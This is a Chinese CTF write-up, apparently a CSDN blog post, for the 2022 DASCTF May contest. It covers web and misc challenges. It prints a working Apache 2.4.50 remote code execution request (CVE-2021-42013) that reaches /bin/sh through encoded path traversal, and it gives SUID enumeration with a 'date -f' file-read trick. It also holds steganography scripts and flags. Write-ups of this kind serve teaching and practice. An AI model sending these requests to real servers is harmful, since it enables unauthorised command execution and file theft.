-
2022DASCTF MAY 出题人挑战赛 Writeup
WEB
Power Cookie
设置Cookie: admin=1;即可
魔法浏览器
把源码中的JS拿到Console运行,得到一个UA
getme
Apache/2.4.50,去年时间出的Apache 远程代码执行 (CVE-2021-42013)
GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1 Host: node4.buuoj.cn:28174 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 If-Modified-Since: Fri, 06 May 2022 14:36:36 GMT If-None-Match: "8d-5de58c91a8500" Content-Length: 45 echo Content-Type: text/plain; echo;ls -lha /- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
MISC
不懂PCB的厨师不是好黑客
DASCTF{77e64b28-3e93-42ed-a576-b2e1ab718be6}- 1
卡比
维吉尼亚
FLAG{IMVERYLIKEKIRBY}- 1
噪音
和我以前出的一题有点像:https://mochu.blog.csdn.net/article/details/122005160对振幅的数值进行分析,可以用上面链接中的脚本分析,或者直接用
010 Editor打开加载wav插件
import wave obj = wave.open('attachment.wav', 'r') frames = obj.getnframes() print("All Frames: {}".format(frames)) frames_data = obj.readframes(50).hex()#提取出前50帧的数据 for i in range(0, len(frames_data), 4): data = frames_data[i:i+4] real_data = int(data[2:] + data[:2], 16) data1 = data[2:] + data[:2] print("第{:<2}帧: {} => {} 真实数据值: {}".format(int((i+4)/4), data,data1 , real_data))- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
简单分析下还是能发现每一帧的数值约等于1000 约等于1500 约等于2000 约等于2500 约等于3000 约等于3500 约等于4000 约等于4500 约等于5000 约等于5500 约等于6000 约等于6500 约等于7000 约等于7500 约等于8000 约等于8500- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
按照区间可以分成十六部分,猜测十六进制
import wave import binascii obj = wave.open('attachment.wav', 'r') frames = obj.getnframes() print("All Frames: {}".format(frames)) frames_data = obj.readframes(frames).hex() hexdata = '' for i in range(0, len(frames_data), 4): data = frames_data[i:i+4] real_data = int(data[2:] + data[:2], 16) if real_data < 1000: hexdata += '0' elif real_data > 1000 and real_data < 1500: hexdata += '1' elif real_data > 1500 and real_data < 2000: hexdata += '2' elif real_data > 2000 and real_data < 2500: hexdata += '3' elif real_data > 2500 and real_data < 3000: hexdata += '4' elif real_data > 3000 and real_data < 3500: hexdata += '5' elif real_data > 3500 and real_data < 4000: hexdata += '6' elif real_data > 4000 and real_data < 4500: hexdata += '7' elif real_data > 4500 and real_data < 5000: hexdata += '8' elif real_data > 5000 and real_data < 5500: hexdata += '9' elif real_data > 5500 and real_data < 6000: hexdata += 'a' elif real_data > 6000 and real_data < 6500: hexdata += 'b' elif real_data > 6500 and real_data < 7000: hexdata += 'c' elif real_data > 7000 and real_data < 7500: hexdata += 'd' elif real_data > 7500 and real_data < 8000: hexdata += 'e' elif real_data > 8000 and real_data < 8500: hexdata += 'f' else: print(real_data) break print(binascii.unhexlify(hexdata))- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
DASCTF{muisc_noise_can_hide_Flaaaag}- 1
rootme
查找具有SUID权限的命令find / -user root -perm -4000 -print 2>/dev/null- 1
date命令有个-f参数可以读文件
神必流量
选中右键...as a Hex Stream复制出来
从37 7a bc af开始截取,转7zfrom binascii import * hexdata = '377abcaf271c00044aaed88750000000000000006a000000000000002d108d3939dc5abb57f2606b99b18fb7518aa378d2dcfed3f7a197d4e752b6156b026bf975d5fa5c37618bdfe2c567592e7128e139c1a6ac4e9eed598dd3398c03c16a35502e827004852aae6a7342214fa901c30104060001095000070b0100022406f107010a5307ef3e981518c6bd122121010001000c4a4600080a011a4cdb8a00000501190900000000000000000011130066006c00610067002e0074007800740000001900140a010066629f3bc46cd801150601002000000000000600313233343536' with open('flag.7z', 'wb') as f: f.write(unhexlify(hexdata))- 1
- 2
- 3
- 4
- 5
解压密码是附加的
123456
得到google云盘下载链接https://drive.google.com/file/d/140MxBVh-OGvQUuk8tmOw4Xm8it9utIzo/view- 1
需要对main.exe进行逆向分析具体请参考:http://www.snowywar.top/?p=3323
DASCTF{6f938f4c-f850-4f04-b489-009c2ed1c4fd}- 1
-
相关阅读:
excel中怎样将数据合并到一个单元格用逗号隔开
【EI会议征稿通知】第十届能源材料与环境工程国际学术会议(ICEMEE 2024)
使用kibana创建索引的时候报错处理
Python可视化数据分析-饼状图
Spring Security即将弃用WebSecurityConfigurerAdapter配置类
Word控件Spire.Doc 【段落处理】教程(六):如何在word文档中设置段落间距
Express框架操作MongoDB数据库
2022年Java秋招面试必看的|Java并发编程面试题
软件测试面试大全(2023版,答案+文档)
基于PChmi.dll的上位机与PLC1200通讯
- 原文地址:https://blog.csdn.net/mochu7777777/article/details/124903862